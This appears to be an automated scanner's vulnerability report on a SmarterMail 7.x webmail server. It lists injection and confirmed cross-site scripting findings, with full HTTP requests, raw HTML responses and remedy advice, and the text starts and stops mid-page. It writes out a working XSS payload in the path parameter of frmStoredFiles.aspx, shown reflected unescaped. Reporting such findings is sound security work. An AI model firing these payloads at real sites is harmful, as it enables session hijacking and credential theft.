<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTdkNjE3OGU3NjkzNDViYWI2ZDk1OTMxMGNhMTJmZTA-" name="ctl00_MPH_HyperGrid1_CB64_NTdkNjE3OGU3NjkzNDViYWI2ZDk1OTMxMGNhMTJmZTA-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzU3ZjA0NzMxZDUxNGQzZjg2YTE4YjBjZDEzZGYxMDU-" name="ctl00_MPH_HyperGrid1_CB64_YzU3ZjA0NzMxZDUxNGQzZjg2YTE4YjBjZDEzZGYxMDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YTMwZmNjNWZmOGNkNDZhN2JhMmJkZDI1MmU0MTlmNTI-" name="ctl00_MPH_HyperGrid1_CB64_YTMwZmNjNWZmOGNkNDZhN2JhMmJkZDI1MmU0MTlmNTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YjlmMWRhZmVlODQ3NDQzYmFjNWQzMmY3NjI1NTc0ZTI-" name="ctl00_MPH_HyperGrid1_CB64_YjlmMWRhZmVlODQ3NDQzYmFjNWQzMmY3NjI1NTc0ZTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad&quo..
- /Main/frmSyncMLList.aspx

/Main/frmSyncMLList.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmSyncMLList.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2)

Injection Request

GET /frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2) HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/Alerts/frmAlert.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /Main/frmSyncMLList.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 02:42:31 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2332
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fMain%2fAlerts%2ffrmAlert.aspx%2f%22ns%3d%22netsparker(0x0038D2)" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAVSJiN4MkY7TWFpbiYjeDJGO0FsZXJ0cyYjeDJGO2ZybUFsZXJ0LmFzcHgmI3gyRjsmcXVvdDtucz0mcXVvdDtuZXRzcGFya2VyKDB4MDAzOEQyKWRkAgcPDxYCHwMFI1BhZ2Ugbm90IGZvdW5kIG9yIHVua25vd24gZXhjZXB0aW9uZGRkhR1wEqGoaoye4+rEy/25HTG4hDw=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;Main&#x2F;Alerts&#x2F;frmAlert.aspx&#x2F;&quot;ns=&quot;netsparker(0x0038D2)</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError">Page not found or unknown exception</span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>



<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:57:26 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 311908
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Synchronization - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmSyncMLList.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1','tctl00$MPH$UP1','tctl00$MPH$UpdatePanel2'], ['ctl00$BPH$btnDeleteAddToOutlook','ctl00$BPH$btnDeleteSyncML','ctl00$BPH$btnDeleteActiveSync'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
Synchronization
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="divSyncML" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditSyncML(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteSyncML(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divAddToOutlook" style="display:none;" class="TogglableButtons">
<div id="ctl00_BPH_btnEditAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditAddToOutlook(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteAddToOutlook(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divActiveSync" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditActiveSync(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteActiveSync(); return false;"><span class="BBInner">Delete</span></a></div>
</div>

</div>
<div class="ButtonBarRight">

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>
<div id="ctl00_trTabStrip" class="TabStripContainer">


<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
<li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Add to Outlook</span></span></a></li>
<li class='htsItem ' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SyncML</span></span></a></li>
<li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>ActiveSync</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab2" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


</div>
<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl03' name='ctl00$MPH$ctl03' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl03_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl03_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu2">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl04' name='ctl00$MPH$ctl04' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu3">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl05' name='ctl00$MPH$ctl05' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
<input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_pvAddToOutlook" />
<div id='ctl00_MPH_pvAddToOutlook' class='' >
<span id="ctl00_MPH_pvAddToOutlook">
<div id="ctl00_MPH_UpdatePanel1">


<div class="HyperGridWrapper" id="ctl00_MPH_grdAddToOutlook">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdAddToOutlook_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_grdAddToOutlookCheckAll" name="ctl00$MPH$grdAddToOutlookCheckAll" /></th><th scope="col" style="overflow: hidden">Outlook Display Name</th><th scope="col" class="leftpad" style="overflow: hidden">Description</th><th scope="col" class="rc ac nw leftpad" style="overflow: hidden">Last Sync</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" name="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" /></td><td></td><td class="leftpad">Outlook Sync Connection</td><td class="rc ac nw leftpad">10/2/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdAddToOut..
Cross-site Scripting

Cross-site Scripting

5 TOTAL
MEDIUM
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This opens several different attack opportunities, most commonly hijacking the current session of the user, or changing the look of the page by altering the HTML on the fly in order to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, an attacker might target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is rendered in the user's browser.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

Remedy References

External References

- /Main/frmStoredFiles.aspx

/Main/frmStoredFiles.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Ealert(0x0001B4)%3C/script%3E

Parameters

Parameter  Type  Value
path       GET   '"--><script>alert(0x0001B4)</script>

Request

GET /Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Enetsparker(0x0001B4)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:44:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6460
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x0001B4)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUI0KTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZD8ETBn4y53viAfrZ6+Mhn0AyyoN" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0001B4)</script>
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="0145da44d7014edea0816314f1ea86b8" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'&quot;-->&lt;script>netsparker(0x0001B4)&lt;/script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">

<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

